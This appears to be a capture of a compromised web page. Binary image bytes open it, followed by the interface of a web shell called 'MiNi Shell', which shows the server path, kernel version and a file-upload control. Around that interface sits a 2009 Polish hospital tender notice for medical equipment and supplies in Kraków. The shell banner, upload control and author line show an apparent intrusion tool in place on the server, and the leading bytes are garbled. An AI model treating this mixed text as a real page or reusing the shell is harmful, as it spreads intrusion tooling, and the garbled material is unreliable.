JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/69109-N-2009.html

<p class="kh_header"><b>Kraków: DOSTAWĘ  SPRZĘTU MEDYCZNEGO  DLA SZPITALA SPECJALISTYCZNEGO               
                         IM. J. DIETLA W KRAKOWIE - NR  SPRAWY: ZP/11/2009r.
do 206.000,00Euro</b><br>
<b>Numer ogłoszenia: 69109 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. J. Dietla , ul. Skarbowa 4, 31-121 Kraków, woj. małopolskie, tel. 012 6876330, faks 012 6876331.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dietl.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWĘ  SPRZĘTU MEDYCZNEGO  DLA SZPITALA SPECJALISTYCZNEGO               
                         IM. J. DIETLA W KRAKOWIE - NR  SPRAWY: ZP/11/2009r.
do 206.000,00Euro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.	OPIS PRZEDMIOTU ZAMÓWIENIA
	
Przedmiotem zamówienia jest dostawa drobnego sprzętu medycznego dla Szpitala Specjalistycznego im. J. Dietla  w Krakowie w następującym zakresie:
Pakiet nr 1 - elektrody o kodzie CPV - 31711140-6 
Pakiet nr 2 - drobny sprzęt medyczny o kodzie CPV -   33000000-1
Pakiet nr 3 -  pojemniki plastikowe na odpady szpitalne+pokrywa o kodzie CPV - 4461 3800-8 
Pakiet nr 4 -  kaczki plastikowe męskie, baseny plastikowe, miski nerkowe plastikowe duże                           
i małe o kodzie CPV - 4461 3800-8 
Pakiet nr 5 - termometry elektroniczne typu  Hartmann, Braun o kodzie CPV - 4461 3800-8 
Pakiet nr 6 - golarki o kodzie CPV - 33721000-0 
Pakiet nr 7 - słuchawki lekarskie pojedyncze, aparaty do mierzenia ciśnienia tętniczego o kodzie  
CPV -   33000000-1
Pakiet nr 8 -  aparaty Ambu , +  maski o kodzie CPV - 3315 7400-9 
Pakiet nr 9 -  papiery medyczne do EKG itp. o kodzie CPV - 22990000-6 
Pakiet nr 10 - żele do EKG o kodzie CPV -  33680000-0 
      Pakiet nr 11 -  worki papierowe 3 warstwowe o kodzie CPV - 33772000-2
      Pakiet nr 12    koce o kodzie  CPV - 39511000-7
      Pakiet nr 13    kołdry i poduszki antyalergiczne, narzuty o kodzie CPV - 395180000-6
      Pakiet nr 14    materace szpitalne z  elastycznej pianki poliuretanowej, paroprzepuszczalnej 
      T 2538  o kodzie  CPV - 39143112-4
      Pakiet nr 15    materace p/ odleżynowe, zmiennociśnieniowe, bąbelkowe o  kodzie CPV -  39143112-4.
2.	Szczegółowy zakres przedmiotu zamówienia określa załącznik nr 2 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 31.71.11.40-6, 33.00.00.00-1, 44.61.38.00-8, 33.72.10.00-0, 33.15.74.00-9, 22.99.00.00-6, 33.68.00.00-0, 33.77.20.00-2, 39.51.10.00-7, 39.14.31.12-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> VII.	WYMAGANE WARUNKI DOPUSZCZAJĄCE WYKONAWCÓW DO UDZIAŁU W POSTĘPOWANIU ORAZ SPOSÓB DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 PZP oraz nie podlegają wykluczeniu z postępowania                     o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 PZP.
2.	Spełnienie wymogów, podanych w ust. 1, należy potwierdzić poprzez złożenie stosownego oświadczenia według załącznika nr 3 do SIWZ oraz poprzez przedłożenie dokumentów, o których mowa w rozdziale VIII.
3.	Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia . Nie spełnienie chociażby jednego warunku, skutkować będzie zgodnie z art. 24 ust. 2 pkt 3 PZP wykluczeniem Wykonawcy z postępowania (odrzuceniem jego oferty), z zastrzeżeniem art. 26 ust. 3 PZP.
4.	Zgodnie z art. 26 ust. 3 PZP Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń i dokumentów             oraz pełnomocnictw, o których mowa w rozdziale VIII, albo złożyli dokumenty zawierające błędy lub złożyli wadliwe pełnomocnictwa, do ich przedłożenia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowaną dostawę wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VIII.	WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU

1)	oświadczenie określone w art. 22 ust. 1 oraz w art. 24 ust. 1 i 2 PZP, zgodnie z załącznikiem nr 3 do SIWZ,
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) zaświadczenie potwierdzające, że przedmiot zamówienia odpowiada określonym normom lub specyfikacjom technicznym, wystawionym  przez podmioty uprawnione do kontroli jakości (np. deklaracja zgodności CE producenta dla wszystkich klas wyrobu medycznego lub certyfikat PZH, lub  normy EN), dotyczy wszystkich pozycji  pakietów,
4)   wpis zgłoszenie do Rejestru Wyrobów Medycznych dla pakietów nr 7 i 8,
5)	opis oferowanego przedmiotu zamówienia lub specyfikacje techniczne w postaci np. katalogu, folderu lub ulotki informacyjnej,
6)	pełnomocnictwo do składania oświadczeń, wniosków, dokumentów w postępowaniu, podpisania umowy, jeżeli nie wynika to z dokumentu wymienionego w pkt. 2.
     

IX.	WYMAGANIA DOTYCZĄCE OFERTY SKŁADANEJ PRZEZ WYKONAWCÓW

1.   Na ofertę składają się (spięte w kolejności jak podano niżej):
1)	wypełniony formularz oferty, zgodnie z załącznikiem nr 1 do SIWZ,
2)	wypełniony formularz cenowy, zgodnie z załącznikiem nr 2 do SIWZ,
3)	oświadczenia i dokumenty jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu (zgodnie z rozdziałem VIII SIWZ).
2. Dokumenty, o których mowa powyżej, mogą być przedstawione w formie oryginału                     lub kserokopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem                      przez Wykonawcę (tj. osoby wymienione w rejestrze lub zaświadczeniu o wpisie                        do ewidencji działalności gospodarczej, posiadające umocowania prawne                                      do reprezentowania Wykonawcy). Dokument wielostronicowy przedłożony w formie kserokopii winien być potwierdzony za zgodność z oryginałem na każdej stronie. Dokumenty na formularzach stanowiących załączniki do SIWZ należy sporządzić w oparciu o wzory określone przez Zamawiającego. 
3. Złożenie dokumentu w niewłaściwej formie (np. nie poświadczone przez Wykonawcę                  za zgodność z oryginałem odpisy lub kopie) traktowane będzie jak jego brak.
4. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika jego zakres, podpisane przez osoby uprawnione                     do reprezentowania Wykonawcy. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być poświadczone za zgodność z oryginałem.
5. Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy przedstawiona przez Wykonawcę kserokopia dokumentu będzie nieczytelna             lub będzie budzić wątpliwości, co do jej prawdziwości.
6. Żadne dokumenty wchodzące w skład oferty, w tym również przedstawione w formie oryginałów nie podlegają zwrotowi przez Zamawiającego.
7. Zamawiający żąda dostarczenia wraz z ofertą po 1 sztuce próbek asortymentów z metką dla pakietów: nr 12,13,14,15 (jeżeli w ostatnich 12 miesiącach od daty ogłoszenia niniejszego zmówienia próbka koca z metką była przekazana do Zamawiającego nie wymaga się dostarczenia kolejnej próbki). Próbki są integralna częścią oferty. Brak wymaganych próbek spowoduje odrzucenie oferty. W przypadku Wykonawców, których oferty nie zostały wybrane, Zamawiający na ich pisemny wniosek zwróci złożone próbki zgodnie z art. 97 ust. 2 PZP.


X.	OFERTA SKŁADANA PRZEZ WYKONAWCĘ, KTÓRY MA SIEDZIBĘ                        LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RP

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w rozdziale VIII pkt 2 SIWZ składa dokument lub dokumenty potwierdzające odpowiednio, że nie otwarto jego likwidacji, ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale VIII pkt 2 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone  przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiedniego dla kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.



XI.	OFERTA SKŁADANA PRZEZ SPÓŁKĘ CYWILNĄ
W przypadku składania oferty przez spółkę cywilną należy przedłożyć dokumenty,                              o których mowa w rozdziale VIII pkt 1 i 2 SIWZ dla każdego ze wspólników tej spółki wraz z umową spółki oraz pełnomocnictwem do reprezentowania wspólników.
XII.	OFERTA SKŁADANA PRZEZ KONSORCJUM
1.	Wykonawcy tworzący konsorcjum, ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania                  w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.
2.	W przypadku wyboru przez Zamawiającego oferty złożonej przez konsorcjum, Wykonawcy tworzący konsorcjum zobowiązani będą, najpóźniej przed podpisaniem umowy                          na wykonanie zamówienia, do przedłożenia umowy konsorcjum.
3.	Zamawiający bezwzględnie wymaga, aby umowa konsorcjum:
1)	określała sposób reprezentacji wszystkich podmiotów oraz upoważniała jednego               z członków konsorcjum - głównego partnera (lidera) do koordynowania czynności związanych z realizacją umowy,
2)	stwierdzała o odpowiedzialności solidarnej partnerów konsorcjum, za całość podjętych zobowiązań w ramach realizacji przedmiotu zamówienia,
3)	oznaczała czas trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia oraz gwarancji jakości,
4)	określała cel gospodarczy obejmujący swoim zakresem przedmiot zamówienia, 
5)	wykluczała możliwość wypowiedzenia umowy konsorcjum przez któregokolwiek              z jego członków do czasu wykonania zamówienia oraz upływu terminu gwarancji,
6)	określała sposób współdziałania podmiotów z określeniem podziału zadań w trakcie realizacji zamówienia,
7)	stwierdzała zakaz zmian w umowie bez zgody Zamawiającego. 
4.	Wszyscy członkowie konsorcjum ponoszą solidarnie odpowiedzialność prawną za realizację zamówienia. Problematykę zobowiązań solidarnych w zakresie nie uregulowanym                    przez umowę konsorcjum regulują przepisy kodeksu cywilnego.
5.	Oferta składana przez konsorcjum zostanie utworzona z dokumentów wymienionych                   w rozdziale VIII SIWZ z zastrzeżeniem, iż dokumenty wymienione w rozdziale VIII pkt 1           i 2 składane są przez każdego z uczestników konsorcjum osobno.
6.	Ocena spełnienia przez konsorcjum warunków i wymogów określonych w rozdziale VII ust. 1 SIWZ będzie polegała na łącznej ocenie złożonych dokumentów.
7.	Oferta konsorcjum musi być podpisana i oznaczona w taki sposób, by prawnie zobowiązywała wszystkie podmioty wchodzące w skład konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dietl.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kraków ul.Skarbowa 4 III p pok 325.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 10:00, miejsce: Oferty należy składać na adres: Szpital Specjalistyczny im. J. Dietla ul. Skarbowa 4, 31-121 Kraków, pokój 307 (Kancelaria), III piętro, nie później niż do dnia 18.05.2009 r. do godz. 10:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com